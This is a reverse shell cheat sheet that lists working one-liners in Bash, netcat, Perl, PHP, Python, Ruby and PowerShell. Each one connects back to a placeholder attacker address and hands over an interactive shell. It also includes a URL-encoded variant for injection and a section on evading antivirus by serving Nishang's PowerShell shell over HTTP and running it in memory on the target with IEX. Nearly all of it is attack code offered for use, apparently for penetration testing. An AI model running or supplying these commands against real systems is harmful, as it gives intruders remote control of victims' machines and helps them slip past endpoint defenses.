Reverse Shell Cheat Sheet

Last modified: 2023-09-15


First of all, start a listener on your local (attacking) machine to catch the incoming connection. Every one-liner below connects back to <your-local-ip> on port 4444 unless noted otherwise, so replace that placeholder with the listener's address and keep the port in sync with the listener.

nc -lvnp 4444

Bash

bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1
bash -c 'bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1'

# For URL param ("&" must be sent as %26, otherwise the web server treats it as a parameter separator and truncates the command)
bash -c 'bash -i >%26 /dev/tcp/<your-local-ip>/4444 0>%261'

with Base64

Encoding the one-liner avoids quoting and special-character problems in the delivery channel. Execute the following commands on the target machine (-w0 stops GNU base64 from wrapping the output at 76 columns, which would break the single-line decode).

echo "bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1" | base64 -w0
echo <base64_string> | base64 -d | bash

Netcat OpenBSD

The OpenBSD netcat has no -e/-c option, so a named pipe is used instead: nc writes what it receives into /tmp/f, the shell reads its commands from that FIFO, and the shell's output is piped back into nc.

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-local-ip> 4444 >/tmp/f

Netcat Traditional / Ncat

ncat <your-local-ip> 4444 -e /bin/bash
ncat <your-local-ip> 4444 -e /bin/sh
ncat <your-local-ip> 4444 -c bash
ncat --udp <your-local-ip> 4444 -e /bin/bash

nc <your-local-ip> 4444 -e /bin/bash
nc <your-local-ip> 4444 -e /bin/sh
nc <your-local-ip> 4444 -c bash
nc -u <your-local-ip> 4444 -e /bin/bash

For the UDP variants start the listener with -u as well (nc -lvnup 4444 or ncat -l --udp 4444). Traditional netcat uses -u for UDP; --udp is an ncat option.

Perl

perl -e 'use Socket;$i="<your-local-ip>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

This relies on the socket being file descriptor 3 in the PHP process, which holds for php -r with no other files open; if the shell does not respond, try 4, 5 or 6.

php -r '$sock=fsockopen("<your-local-ip>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("<your-local-ip>", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your-local-ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Ruby

ruby -rsocket -e'f=TCPSocket.open("<your-local-ip>",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("<your-local-ip>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

The same shell passed as a quoted string (this variant connects to port 1234, so start the listener with nc -lvnp 1234):

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('<your-local-ip>',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Bypass Antivirus

Nishang

Nishang (https://github.com/samratashok/nishang) is a collection of offensive PowerShell scripts for red teaming and penetration testing. The Invoke-PowerShellTcp script used below is old and widely signatured, so Defender and AMSI commonly block it on a patched Windows host; the "bypass" here is the download-and-run-in-memory delivery that keeps the script off disk, not a guarantee against current signatures.

1. Preparing the Payload in Your Local Machine

First off, copy the payload to the current working directory.

cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Append the following line to the end of the payload (shell.ps1) so that the script invokes the reverse shell as soon as it is loaded:

Invoke-PowerShellTcp -Reverse -IPAddress <your-local-ip> -Port 4444

2. Opening a Web Server on Your Local Machine

Serve the payload over HTTP from your local machine so the target can fetch it; keep the listener from the first step running in another terminal.

python3 -m http.server 8000

3. Downloading the Payload and Executing the Reverse Shell

On the target machine, download the locally hosted payload and run it directly in memory. The shell connects back to the listener from the first step.

cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')

If nothing arrives at the listener, check the http.server log for the GET request first: a hit with no connection usually means the script was blocked on the target, while no hit means the download itself failed (wrong address, firewall, or egress filtering).